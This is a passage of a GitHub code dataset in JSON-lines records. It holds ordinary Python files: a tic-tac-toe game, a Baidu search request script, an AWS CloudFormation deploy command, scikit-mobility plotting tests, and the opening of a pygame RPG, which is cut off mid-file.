}\n\n return ConfigComment(\n config_dict={'policies': policies},\n is_only_next_line=is_only_next_line\n )\n\n\ndef is_config_comment(comment_content):\n # type: (str) -> bool\n return CONFIG_COMMENT_PATTERN.match(comment_content) is not None\n","repo_name":"Vimjas/vint","sub_path":"vint/linting/config/config_comment_parser.py","file_name":"config_comment_parser.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":685,"dataset":"github-code","pt":"66"} +{"seq_id":"28453813003","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\n# Initialize Tkinter window\r\nroot = tk.Tk()\r\nroot.title(\"Tic Tac Toe\")\r\nroot.geometry('1010x790')\r\n\r\n# Initialize game variables\r\nboard = {\"1\": \" \", \"2\": \" \", \"3\": \" \",\r\n \"4\": \" \", \"5\": \" \", \"6\": \" \",\r\n \"7\": \" \", \"8\": \" \", \"9\": \" \"}\r\nplayer = \"X\"\r\n\r\n# Function to update the game board\r\ndef update_board(button, spot):\r\n global player\r\n print(spot)\r\n if board[spot] == \" \":\r\n board[spot] = player\r\n button.config(text=player)\r\n check_winner()\r\n switch_player()\r\n root.title(\"Turn: \" + player)\r\n\r\n# Function to switch between players\r\ndef switch_player():\r\n global player\r\n if player == \"X\":\r\n player = \"O\"\r\n else:\r\n player = \"X\"\r\n\r\n# Function to check if there is a winner\r\ndef check_winner():\r\n if (board[\"1\"] == board[\"2\"] == board[\"3\"] != \" \" or\r\n board[\"4\"] == board[\"5\"] == board[\"6\"] != \" \" or\r\n board[\"7\"] == board[\"8\"] == board[\"9\"] != \" \" or\r\n board[\"1\"] == board[\"4\"] == board[\"7\"] != \" \" or\r\n board[\"2\"] == board[\"5\"] == board[\"8\"] != \" \" or\r\n board[\"3\"] == board[\"6\"] == board[\"9\"] != \" \" or\r\n board[\"1\"] == board[\"5\"] == board[\"9\"] != \" \" or\r\n board[\"3\"] == board[\"5\"] == board[\"7\"] != \" \"):\r\n root.after(10, end_game())\r\n\r\n# Function to end the game\r\ndef end_game():\r\n global player\r\n messagebox.showinfo(\"Game Over\", player + \" wins!\")\r\n root.destroy()\r\n\r\nbutton1 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button1, \"1\"))\r\nbutton2 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button2, \"2\"))\r\nbutton3 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button3, \"3\"))\r\nbutton4 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button4, \"4\"))\r\nbutton5 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button5, \"5\"))\r\nbutton6 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button6, \"6\"))\r\nbutton7 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button7, \"7\"))\r\nbutton8 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button8, \"8\"))\r\nbutton9 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button9, \"9\"))\r\n\r\nlist_of_buttons = [button1, button2, button3, button4, button5, button6, button7, button8, button9]\r\ncount = 0\r\n\r\nfor i in list_of_buttons:\r\n count += 1\r\n i.grid(row = (count - 1) // 3, column = (count - 1) % 3)\r\n i.config(font=(\"Courier\", 28))\r\n\r\nroot.mainloop()","repo_name":"matt-berk/data-structures","sub_path":"school work/mini.py","file_name":"mini.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23935051399","text":"# 安装requests\n# pip install requests\n\nimport requests\nquery = input(\"请输入想搜索的\")\nurl=f'http://www.baidu.com/s?wd={query}'\nheaders ={\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\"\n}\nres=requests.get(url, headers=headers)\n\n# code为状态码,text网页源码\nprint(res.text)\nres.close()","repo_name":"lifei-2019/crawlers","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12498559372","text":"\"\"\"\nCompanyInfo class\n\"\"\"\n\n\nclass CompanyInfo:\n \"\"\"\n This class represents company info\n \"\"\"\n\n def __init__(self, ticker: str, market_cap: float, free_float_market_cap: float) -> None:\n \"\"\"\n This method initializes CompanyInfo object\n :param ticker: ticker symbol\n :param market_cap: market cap\n :param free_float_market_cap: free float market cap\n \"\"\"\n super().__init__()\n self.symbol: str = ticker\n self.market_cap: float = market_cap\n self.free_float_market_cap: float = free_float_market_cap\n\n @classmethod\n def from_json(cls, ticker: str, json_result: dict):\n \"\"\"\n This method creates CompanyInfo object from json\n :param ticker: ticker symbol\n :param json_result: result\n :return: CompanyInfo object\n \"\"\"\n # It is possible that either of these keys are not present in the json. In that case, set market_cap to 0\n trade_info = json_result.get('marketDeptOrderBook', {}).get('tradeInfo', {})\n total_market_cap = trade_info.get('totalMarketCap', 0)\n ffmc = trade_info.get('ffmc', 0)\n return cls(\n ticker=ticker,\n market_cap=total_market_cap,\n free_float_market_cap=ffmc\n )\n","repo_name":"adityazagade/momentum-fund","sub_path":"model/company_info.py","file_name":"company_info.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4311084382","text":"from ..utils import aws, utils, conventions\nfrom ..services.cloudformation import validate_template, package_template, deploy_template, get_template, get_config, get_stack_details\nfrom . import options\n\n\ndef add_subparser(subparsers):\n parser = subparsers.add_parser(\n 'deploy',\n aliases=['dpl'],\n parents=[\n options.common(),\n options.template_config(),\n options.package_destination(),\n options.approve()\n ],\n help='Validates, Packages and Deploys the specified AWS CloudFormation template by creating and then executing a change set.'\n )\n parser.add_argument(\n '--output-template-file',\n '-o',\n help='The path to the file where the command writes the output AWS CloudFormation template. (default: packaged.yml)',\n default='packaged.yml'\n )\n parser.set_defaults(subcommand=main)\n\n\ndef main(args):\n session = aws.get_session(args.profile)\n aws.display_session_info(session)\n template = get_template(args.template)\n config = get_config(args.config)\n\n validate_template(\n session,\n template,\n config\n )\n\n conventions.display_generated_values(config)\n\n if not args.approve:\n utils.get_confirmation()\n\n packaged_yaml = package_template(\n session,\n args\n )\n\n success = deploy_template(\n session,\n config,\n packaged_yaml,\n args.approve\n )\n\n if success:\n stack_name = conventions.generate_stack_name(config['Parameters'])\n stack_details = get_stack_details(session, stack_name)\n aws.display_cfn_stack_outputs(stack_details)\n","repo_name":"vinh3928/dhi-cloudformation-tools","sub_path":"cfn/subcommands/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26165556365","text":"from subprocess import Popen\nimport sys\nimport os\nexefile='winword.exe'\npathfile=r'c:/Program Files'\n\nclass checkdir:\n\n \n\n def find_all(self, exefile, pathfile):\n result = []\n for root, dirs, files in os.walk(pathfile):\n if exec in files:\n result.append(os.path.join(root, exefile))\n return False\n \n\n\n\n","repo_name":"Robotz213/Convert2PDF","sub_path":"checkword.py","file_name":"checkword.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5084951720","text":"import numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport shapely\nimport pytest\nfrom ...core.trajectorydataframe import TrajDataFrame, FlowDataFrame\nfrom .. import plot\nfrom ...utils import constants\nfrom ...preprocessing import detection, clustering\nimport folium\nimport matplotlib\n\nlat = constants.LATITUDE\nlng = constants.LONGITUDE\ndt = constants.DATETIME\nuid = constants.UID\ntid = constants.TID\natol = 1e-12\n\n\ndef all_equal(a, b):\n return np.allclose(a, b, rtol=0., atol=atol)\n\n\nlats_lngs = np.array([ [39.97, 116.32],\n [39.90, 116.51],\n [39.60, 116.60],\n [40.01, 115.90],\n [39.96, 115.85],\n [39.70, 115.80],\n [39.5999, 116.5999],\n [38.60, 115.56],\n [38.98, 114.51],\n [40.19, 114.32],\n [40.97, 113.82]])\n\ntraj = pd.DataFrame(lats_lngs, columns=[lat, lng])\n\ntraj[dt] = pd.to_datetime([\n '2013/01/01 8:00:00', '2013/01/01 8:05:00',\n '2013/01/01 8:10:00', '2013/01/01 9:00:00',\n '2013/01/01 9:01:00', '2013/01/02 9:55:00',\n '2013/01/02 9:57:00', '2013/01/02 10:40:00',\n '2013/01/01 1:00:00', '2013/01/01 1:00:10', '2013/01/01 2:00:00'])\n\ntraj[uid] = [1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2]\ntraj[tid] = [0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0]\n\ntdf_test = TrajDataFrame(traj)\n\nall_users = [1, 2, 3]\n\n\npoints = [shapely.geometry.Point(ll) for ll in [[39.97, 116.32], [39.90, 116.51]]]\n\nlines = [shapely.geometry.LineString(ll) for ll in [[[116.32, 39.97], [116.51, 39.90]],\n [[116.22, 39.87], [116.41, 39.80]]]]\n\npolygons = [shapely.geometry.Polygon(ll) for ll in [[[116.32, 39.97], [116.51, 39.90], [116.51, 39.97]],\n [[116.22, 39.87], [116.41, 39.80], [116.22, 39.80]]]]\n\n\n# tessellation\n\ntess_polygons = [[[7.481, 45.184],\n [7.481, 45.216],\n [7.526, 45.216],\n [7.526, 45.184],\n [7.481, 45.184]],\n [[7.481, 45.216],\n [7.481, 45.247],\n [7.526, 45.247],\n [7.526, 45.216],\n [7.481, 45.216]],\n [[7.526, 45.184],\n [7.526, 45.216],\n [7.571, 45.216],\n [7.571, 45.184],\n [7.526, 45.184]]]#,\n # [[7.526, 45.216],\n # [7.526, 45.247],\n # [7.571, 45.247],\n # [7.571, 45.216],\n # [7.526, 45.216]]]\n\ngeom = [shapely.geometry.Polygon(p) for p in tess_polygons]\ntessellation = gpd.GeoDataFrame(geometry=geom, crs=\"EPSG:4326\")\ntessellation = tessellation.reset_index().rename(columns={\"index\": constants.TILE_ID})\n\n\n# flows\n\nflow_list = [[1, 0, 1],\n [5, 0, 2],\n [3, 1, 0],\n [2, 1, 2],\n [8, 2, 0],\n [9, 2, 1],]\n\ndf = pd.DataFrame(flow_list, columns=[constants.FLOW, constants.ORIGIN, constants.DESTINATION])\nfdf = FlowDataFrame(df, tessellation=tessellation)\n\n\n# plot_trajectory\n\n@pytest.mark.parametrize('tdf', [tdf_test])\n@pytest.mark.parametrize('marker', [True, False])\ndef test_plot_trajectory(tdf, marker):\n map_f = plot.plot_trajectory(tdf, start_end_markers=marker)\n assert isinstance(map_f, folium.folium.Map)\n\n\n@pytest.mark.parametrize('tdf', [tdf_test])\n@pytest.mark.parametrize('marker', [True, False])\ndef test_plot_trajectory_tdf(tdf, marker):\n map_f = tdf.plot_trajectory(start_end_markers=marker)\n assert isinstance(map_f, folium.folium.Map)\n\n\n# plot_stops\n\n@pytest.mark.parametrize('tdf', [tdf_test])\ndef test_plot_stops(tdf):\n map_f = plot.plot_trajectory(tdf)\n # map_f = plot.plot_stops(tdf, map_f=map_f)\n\n stdf = detection.stay_locations(tdf)\n map_f = plot.plot_stops(stdf, map_f=map_f)\n\n assert isinstance(map_f, folium.folium.Map)\n\n\n@pytest.mark.parametrize('tdf', [tdf_test])\ndef test_plot_stops_tdf(tdf):\n map_f = tdf.plot_trajectory()\n # map_f = tdf.plot_stops(map_f=map_f)\n\n stdf = detection.stay_locations(tdf)\n map_f = stdf.plot_stops(map_f=map_f)\n\n assert isinstance(map_f, folium.folium.Map)\n\n\n# plot_diary\n\n@pytest.mark.parametrize('tdf', [tdf_test])\n@pytest.mark.parametrize('user', [1, 2])\n@pytest.mark.parametrize('start_datetime', [None, '2013/01/01 00:00:00'])\ndef test_plot_diary(tdf, user, start_datetime):\n stdf = detection.stay_locations(tdf)\n cstdf = clustering.cluster(stdf)\n ax = plot.plot_diary(cstdf, user, start_datetime=start_datetime)\n\n assert isinstance(ax, matplotlib.axes._subplots.Subplot)\n\n\n@pytest.mark.parametrize('tdf', [tdf_test])\n@pytest.mark.parametrize('user', [1, 2])\n@pytest.mark.parametrize('start_datetime', [None, '2013/01/01 00:00:00'])\ndef test_plot_diary(tdf, user, start_datetime):\n stdf = detection.stay_locations(tdf)\n cstdf = clustering.cluster(stdf)\n ax = cstdf.plot_diary(user, start_datetime=start_datetime)\n\n assert isinstance(ax, matplotlib.axes._subplots.Subplot)\n\n\n# plot_flows\n\n@pytest.mark.parametrize('fdf', [fdf])\n@pytest.mark.parametrize('min_flow', [0, 2])\n@pytest.mark.parametrize('flow_popup', [False, True])\ndef test_plot_flows(fdf, min_flow, flow_popup):\n map_f = plot.plot_flows(fdf, min_flow=min_flow, flow_popup=flow_popup)\n assert isinstance(map_f, folium.folium.Map)\n\n@pytest.mark.parametrize('fdf', [fdf])\n@pytest.mark.parametrize('min_flow', [0, 2])\n@pytest.mark.parametrize('flow_popup', [False, True])\ndef test_plot_flows_fdf(fdf, min_flow, flow_popup):\n map_f = fdf.plot_flows(min_flow=min_flow, flow_popup=flow_popup)\n assert isinstance(map_f, folium.folium.Map)\n\n\n# plot_gdf\n\n@pytest.mark.parametrize('geom', [points, lines, polygons])\ndef test_plot_gdf(geom):\n gdf = gpd.GeoDataFrame(geom, columns=['geometry'])\n map_f = plot.plot_gdf(gdf)\n assert isinstance(map_f, folium.folium.Map)\n\n\n","repo_name":"scikit-mobility/scikit-mobility","sub_path":"skmob/utils/tests/test_plots.py","file_name":"test_plots.py","file_ext":"py","file_size_in_byte":5694,"program_lang":"python","lang":"en","doc_type":"code","stars":661,"dataset":"github-code","pt":"66"} +{"seq_id":"20172938456","text":"# The Legend of Sky Realm by Raven Ironwing\n\nimport tracemalloc\nimport gc\nimport pygame as pg\nimport sys\nimport pickle\nimport pygame.surfarray as surfarray\nfrom random import choice, random, choices\nfrom os import path, makedirs\nfrom settings import *\nfrom npcs import *\nfrom quests import *\nfrom menu import *\nfrom sprites import *\nfrom tilemap import *\nimport datetime\nfrom time import sleep, perf_counter\nimport math\nfrom menu import Item_Icon\nfrom pygame.locals import *\nfrom pytmx.util_pygame import load_pygame\nimport pyscroll\nimport pyscroll.data\nfrom pyscroll.group import PyscrollGroup\n\ntracemalloc.start()\n\n#npc_q = Queue()\n\n#def get_tile_number(sprite, layer): # Gets the type of tile a sprite is on.\n# x = int(sprite.pos.x / sprite.game.map.tile_size)\n# y = int(sprite.pos.y / sprite.game.map.tile_size)\n# if x < 0: x = 0\n# if y < 0: y = 0\n# if x >= sprite.game.map.tiles_wide: x = sprite.game.map.tiles_wide - 1\n# if y >= sprite.game.map.tiles_high: y = sprite.game.map.tiles_high - 1\n# return sprite.game.map.tmxdata.get_tile_gid(x, y, layer)\n\n#def get_tile_props(sprite, layer): # Gets the type of tile a sprite is on.\n# x = int(sprite.pos.x / sprite.game.map.tile_size)\n# y = int(sprite.pos.y / sprite.game.map.tile_size)\n# if x < 0: x = 0\n# if y < 0: y = 0\n# if x >= sprite.game.map.tiles_wide: x = sprite.game.map.tiles_wide - 1\n# if y >= sprite.game.map.tiles_high: y = sprite.game.map.tiles_high - 1\n# return sprite.game.map.tmxdata.get_tile_properties(x, y, layer)\n\n\ndef trace_mem():\n snapshot = tracemalloc.take_snapshot()\n top_stats = snapshot.statistics('lineno')\n\n print(\"[ Top 10 ]\")\n for stat in top_stats[:10]:\n print(stat)\n\n# HUD functions\ndef draw_player_stats(surf, x, y, pct, color = GREEN, bar_length = 100):\n if pct < 0:\n pct = 0\n bar_height = 20\n fill = pct * bar_length\n outline_rect = pg.Rect(x, y, bar_length, bar_height)\n fill_rect = pg.Rect(x, y, fill, bar_height)\n if pct > 0.6:\n col = color\n elif pct > 0.3:\n col = YELLOW\n else:\n col = RED\n pg.draw.rect(surf, col, fill_rect)\n pg.draw.rect(surf, WHITE, outline_rect, 2)\n\n# Used for loading sprite sheet images into a list of images\n\ndef load_spritesheet(sheet, size):\n image_list = []\n sheet_width = sheet.get_width()\n sheet_height = sheet.get_height()\n columns = int(sheet_width / size)\n rows = int(sheet_height / size)\n # Create a new blank image\n\n for col in range(0, columns):\n y = col * size\n for row in range(0, rows):\n x = row * size\n image = pg.Surface([size, size], pg.SRCALPHA).convert_alpha()\n # Copy the sprite from the large sheet onto the smaller image\n image.blit(sheet, (0, 0), (x, y, size, size))\n image_list.append(image)\n # Return the separate images stored in a list.\n return image_list\n\n# Used to see if the player is in talking range of an Npc\ndef npc_talk_rect(one, two):\n if one.hit_rect.colliderect(two.talk_rect):\n return True\n else:\n return False\n\ndef mob_hit_rect(one, two):\n if one.hit_rect.colliderect(two.hit_rect):\n return True\n else:\n return False\n\ndef breakable_melee_hit_rect(one, two):\n if one.mother.weapon_hand == 'weapons':\n if True in (one.mid_weapon_melee_rect.colliderect(two.trunk.hit_rect), one.weapon_melee_rect.colliderect(two.trunk.hit_rect), one.melee_rect.colliderect(two.trunk.hit_rect)):\n if one.swing_weapon1: # This differentiates between weapons that are being swung and those that are thrusted.\n if one.frame > 6:\n return True\n elif one.frame < 6:\n return True\n else:\n return False\n\n elif one.mother.weapon_hand == 'weapons2':\n if True in (one.mid_weapon2_melee_rect.colliderect(two.trunk.hit_rect), one.weapon2_melee_rect.colliderect(two.trunk.hit_rect), one.melee2_rect.colliderect(two.trunk.hit_rect)):\n if one.swing_weapon2:\n if one.frame > 6:\n return True\n elif one.frame < 6:\n return True\n return False\n\n# Used to define fireball hits\ndef fire_collide(one, two):\n if one.hit_rect.colliderect(two.hit_rect):\n return True\n else:\n return False\n\ndef entryway_collide(one, two):\n if one.rect.colliderect(two.hit_rect):\n return True\n else:\n return False\n\nclass Game:\n def __init__(self):\n self.screen_width = WIDTH\n self.screen_height = HEIGHT\n #self.flags = pg.NOFRAME\n self.flags = pg.SCALED # | pg.FULLSCREEN\n #self.screen = pg.display.set_mode((self.screen_width, HEIGHT), pg.FULLSCREEN)\n icon_image = pg.image.load(path.join(img_folder, ICON_IMG))\n pg.display.set_icon(icon_image)\n self.screen = pg.display.set_mode((self.screen_width, self.screen_height), self.flags)\n pg.display.set_caption(TITLE)\n self.clock = pg.time.Clock()\n self.dt = 0.0001\n # Loads Mutant Python Logo Faid in/out.\n mpy_logo_image = pg.image.load(path.join(img_folder, LOGO_IMAGE)).convert_alpha()\n mpy_logo_image = pg.transform.scale(mpy_logo_image, (int(self.screen_height/4), int(self.screen_height/4)))\n logo_width = mpy_logo_image.get_width()\n logo_placement = ((self.screen_width - logo_width)/2, (self.screen_height - logo_width)/2)\n mpy_words_image = pg.image.load(path.join(img_folder, MPY_WORDS)).convert_alpha()\n mpy_words_image = pg.transform.scale(mpy_words_image, (int(self.screen_width/4), int(self.screen_height/8)))\n words_height = mpy_words_image.get_height()\n words_width = mpy_words_image.get_width()\n words_placement = ((self.screen_width - words_width)/2, (self.screen_height - words_height)/2)\n for i in range(0, 256):\n self.clock.tick(120)\n self.screen.fill(BLACK)\n pg.display.flip()\n for i in range(0, 256):\n self.clock.tick(120)\n self.screen.fill(BLACK)\n mpy_logo_image.set_alpha(i)\n if i == 10:\n pg.mixer.Sound(path.join(snd_folder, 'mutant_python.ogg')).play()\n self.screen.blit(mpy_logo_image, logo_placement)\n pg.display.flip()\n self.load_data()\n for i in range(255, 0, -1):\n self.clock.tick(120)\n self.screen.fill(BLACK)\n mpy_logo_image.set_alpha(i)\n self.screen.blit(mpy_logo_image, logo_placement)\n pg.display.flip()\n for i in range(0, 256):\n self.clock.tick(120)\n self.screen.fill(BLACK)\n pg.display.flip()\n self.channel2 = pg.mixer.Channel(2)\n self.channel3 = pg.mixer.Channel(3)\n self.channel4 = pg.mixer.Channel(4)\n self.channel5 = pg.mixer.Channel(5)\n self.channel6 = pg.mixer.Channel(6)\n self.channel7 = pg.mixer.Channel(7)\n self.channel_list = [self.channel2, self.channel3, self.channel4, self.channel5, self.channel6, self.channel7]\n\n def on_screen(self, sprite, threshold = 50):\n rect = self.camera.apply(sprite)\n if rect.right < -threshold or rect.bottom < -threshold or rect.left > self.screen_width + threshold or rect.top > self.screen_height + threshold:\n return False\n else:\n return True\n\n# def on_screen_no_edge(self, sprite): #no threashold for slightly faster draw.\n# rect = self.camera.apply(sprite)\n# if rect.right < 0 or rect.bottom < 0 or rect.left > self.screen_width or rect.top > self.screen_height:\n# return False\n# else:\n# return True\n\n def is_living(self, npc_kind):\n if 'dead' in self.people[npc_kind]:\n if self.people[npc_kind]['dead']:\n return False\n else:\n return True\n else:\n return True\n\n def format_date(self):\n directive = \"%m-%d-%Y_%H-%M-%S\"\n return datetime.datetime.now().strftime(directive)\n\n def save_sprite_locs(self):\n # This block stores all sprite locations and their health/inventories in the map_sprite_data_list so the game remembers where everything is.\n npc_list = []\n animal_list = []\n item_list = []\n vehicle_list = []\n breakable_list = []\n if not self.underworld:\n for npc in self.npcs:\n if npc not in self.companions:\n npc_list.append({'name': npc.kind, 'location': npc.pos})\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].npcs = npc_list\n for animal in self.animals:\n if animal not in self.companions:\n if animal != self.player.vehicle:\n animal_list.append({'name': animal.kind, 'location': animal.pos})\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].animals = animal_list\n for item in self.dropped_items:\n item_list.append({'name': item.name, 'location': item.pos, 'rotation': item.rot})\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].items = item_list\n for vehicle in self.vehicles:\n if vehicle.driver != self.player:\n vehicle_list.append({'name': vehicle.kind, 'location': vehicle.pos})\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].vehicles = vehicle_list\n for breakable in self.breakable:\n breakable_list.append({'name': breakable.name, 'location': breakable.center, 'w': breakable.w, 'h': breakable.h, 'rotation': breakable.rot})\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].breakable = breakable_list\n else:\n for npc in self.npcs:\n if npc not in self.companions:\n npc_list.append({'name': npc.kind, 'location': npc.pos})\n self.underworld_sprite_data_dict[self.previous_map].npcs = npc_list\n for animal in self.animals:\n if animal not in self.companions:\n if animal != self.player.vehicle:\n animal_list.append({'name': animal.kind, 'location': animal.pos})\n self.underworld_sprite_data_dict[self.previous_map].animals = animal_list\n for item in self.dropped_items:\n item_list.append({'name': item.name, 'location': item.pos, 'rotation': item.rot})\n self.underworld_sprite_data_dict[self.previous_map].items = item_list\n for vehicle in self.vehicles:\n vehicle_list.append({'name': vehicle.kind, 'location': vehicle.pos})\n self.underworld_sprite_data_dict[self.previous_map].vehicles = vehicle_list\n for breakable in self.breakable:\n breakable_list.append({'name': breakable.name, 'location': breakable.center, 'w': breakable.w, 'h': breakable.h, 'rotation': breakable.rot})\n self.underworld_sprite_data_dict[self.previous_map].breakable = breakable_list\n\n def save(self, slot):\n self.screen.fill(BLACK)\n self.save_sprite_locs()\n possessing = self.player.possessing\n if self.player.possessing:\n self.player.possessing.depossess()\n self.player.dragon = False\n if 'dragon' in self.player.equipped['race']: # Makes it so you aren't a dragon when you load a game.\n self.player.equipped['race'] = self.player.equipped['race'].replace('dragon', '')\n self.player.body.update_animations()\n self.draw_text('Saving....', self.script_font, 50, WHITE, self.screen_width / 2, self.screen_height / 2, align=\"topright\")\n pg.display.flip()\n sleep(0.5)\n companion_list = []\n for companion in self.companions:\n companion_list.append(companion.kind)\n vehicle_name = None\n if self.player.in_vehicle:\n vehicle_name = self.player.vehicle.kind\n\n # self.previous_map is used keep track of the last map you were on.\n save_list = [self.player.inventory, self.player.equipped, self.player.stats, self.player.expanded_inventory, [self.player.pos.x, self.player.pos.y], self.previous_map, [self.world_location.x, self.world_location.y], self.overworld_map, vehicle_name, companion_list, self.map_sprite_data_list, self.key_map, self.animals_dict, self.people, self.quests]\n if not path.isdir(saves_folder): makedirs(saves_folder)\n\n with open(path.join(saves_folder, str(slot) + \"_\" + self.format_date() + \".sav\"), \"wb\", -1) as FILE:\n pickle.dump(save_list, FILE)\n if possessing:\n possessing.possess(self.player)\n\n def load_save(self, file_name):\n self.continued_game = True\n load_file = []\n with open(file_name, \"rb\", -1) as FILE:\n load_file = pickle.load(FILE)\n self.player.inventory = load_file[0]\n self.player.equipped = load_file[1]\n self.player.stats = load_file[2]\n self.player.expanded_inventory = load_file[3]\n self.player.pos = vec(load_file[4])\n self.previous_map = load_file[5]\n self.world_location = vec(load_file[6])\n self.overworld_map = load_file[7]\n self.saved_vehicle = load_file[8]\n self.saved_companions = [9]\n self.map_sprite_data_list = load_file[10]\n self.key_map = load_file[11]\n self.animals_dict = load_file[12]\n self.people = load_file[13]\n self.quests = load_file[14]\n self.load_over_map(self.overworld_map)\n self.load_map(self.previous_map)\n self.map.stored_map_data = self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)] # Sets the map stored data object to the one that was saved for that map location.\n self.map.load_stored_data() # Loads the stored data into the map\n self.player.human_body.update_animations()\n self.player.dragon_body.update_animations()\n self.player.calculate_fire_power()\n #self.player.calculate_perks()\n #Update hud stats\n self.hud_health_stats = self.player.stats\n self.hud_health = self.hud_health_stats['health'] / self.hud_health_stats['max health']\n self.hud_stamina = self.hud_health_stats['stamina'] / self.hud_health_stats['max stamina']\n self.hud_magica = self.hud_health_stats['magica'] / self.hud_health_stats['max magica']\n self.hud_hunger = self.hud_health_stats['hunger'] / self.hud_health_stats['max hunger']\n # Loads saved companions\n for companion in self.saved_companions:\n for npc_type in NPC_TYPE_LIST:\n if companion in eval(npc_type.upper()):\n rand_angle = randrange(0, 360)\n random_vec = vec(170, 0).rotate(-rand_angle)\n follower_center = vec(self.player.pos + random_vec)\n if npc_type == 'animals':\n if companion != self.saved_vehicle: #Makes it so it doesn't double load companions you are riding.\n follower = Animal(self, follower_center.x, follower_center.y, companion)\n follower.offensive = False\n follower.make_companion()\n else:\n follower = Player(self, follower_center.x, follower_center.y, companion)\n follower.offensive = False\n follower.make_companion()\n self.saved_companions = []\n # Enters vehicle if you saved it inside a vehicle\n for vehicle in self.vehicles:\n if vehicle.kind == self.saved_vehicle:\n vehicle.enter_vehicle(self.player)\n for vehicle in self.flying_vehicles:\n if vehicle.kind == self.saved_vehicle:\n vehicle.enter_vehicle(self.player)\n if self.saved_vehicle in self.animals_dict:\n mount = Animal(self, self.player.pos.x, self.player.pos.y, self.saved_vehicle)\n mount.mount(self.player)\n\n def update_old_save(self, file_name):\n load_file = []\n with open(file_name, \"rb\", -1) as FILE:\n load_file = pickle.load(FILE)\n # Loads saved upgraded equipment:\n self.people = PEOPLE # Updates NPCs\n self.animals_dict = ANIMALS\n self.quests = QUESTS # Updates Quests from save\n self.key_map = KEY_MAP\n self.player.inventory = load_file[0]\n self.player.equipped = load_file[1]\n self.player.stats = load_file[2]\n self.player.expanded_inventory = load_file[3]\n self.player.pos = vec(load_file[4])\n self.previous_map = load_file[5]\n self.world_location = vec(load_file[6])\n self.overworld_map = load_file[7]\n self.saved_vehicle = load_file[8]\n self.saved_companions = [9]\n self.map_sprite_data_list = load_file[10]\n self.key_map = load_file[11]\n self.animals_dict = load_file[12]\n self.people = load_file[13]\n self.quests = load_file[14]\n self.load_map(self.previous_map)\n self.player.pos = vec(load_file[3])\n self.player.human_body.update_animations()\n self.player.dragon_body.update_animations()\n self.player.calculate_fire_power()\n #self.player.calculate_perks()\n self.overworld_map = load_file[7]\n self.load_over_map(self.overworld_map)\n\n def draw_text(self, text, font_name, size, color, x, y, align=\"topleft\"):\n font = pg.font.Font(font_name, size)\n text_surface = font.render(text, True, color)\n text_rect = text_surface.get_rect(**{align: (x, y)})\n self.screen.blit(text_surface, text_rect)\n\n\n def load_data(self):\n self.title_font = HEADING_FONT\n self.hud_font = HUD_FONT\n self.script_font = SCRIPT_FONT\n self.dim_screen = pg.Surface(self.screen.get_size()).convert_alpha()\n self.dim_screen.fill((SHADOW))\n self.body_surface = pg.Surface((64, 64)).convert()\n self.body_surface.set_colorkey(BLACK)\n self.open_book_image = pg.image.load(path.join(img_folder, 'open_book.png')).convert()\n self.open_book_image = pg.transform.scale(self.open_book_image, (self.screen_width, self.screen_height - 30))\n self.open_letter_image = pg.image.load(path.join(img_folder, 'open_letter.png')).convert()\n self.open_letter_image = pg.transform.scale(self.open_letter_image, (self.screen_width, self.screen_height - 30))\n self.over_minimap_image = pg.image.load(path.join(img_folder, OVERWORLD_MAP_IMAGE)).convert()\n self.over_minimap_image = pg.transform.scale(self.over_minimap_image, (self.screen_height, self.screen_height))\n self.compass_image = pg.image.load(path.join(img_folder, 'compass.png')).convert_alpha()\n self.crosshair_image = pg.image.load(path.join(img_folder, 'crosshair.png')).convert_alpha()\n self.crosshair_offset = int(self.crosshair_image.get_width()/2)\n self.player_tur = pg.image.load(path.join(img_folder, PLAYER_TUR)).convert_alpha()\n #self.player_tank = pg.image.load(path.join(img_folder, PLAYER_TANK)).convert_alpha()\n #self.tank_in_water = pg.image.load(path.join(img_folder, TANK_IN_WATER)).convert_alpha()\n #self.sunken_tank = pg.image.load(path.join(img_folder, SUNKEN_TANK)).convert_alpha()\n self.lock_image = pg.image.load(path.join(img_folder, 'lock.png')).convert_alpha()\n self.lock_keyway_image = pg.image.load(path.join(img_folder, 'lock_keyway.png')).convert_alpha()\n self.keyed_keyway_image = pg.image.load(path.join(img_folder, 'keyed_keyway.png')).convert_alpha()\n self.lock_pick_image = pg.image.load(path.join(img_folder, 'lock_pick.png')).convert_alpha()\n self.swim_shadow_image = pg.image.load(path.join(img_folder, 'swim_shadow.png')).convert_alpha()\n self.mech_back_image = 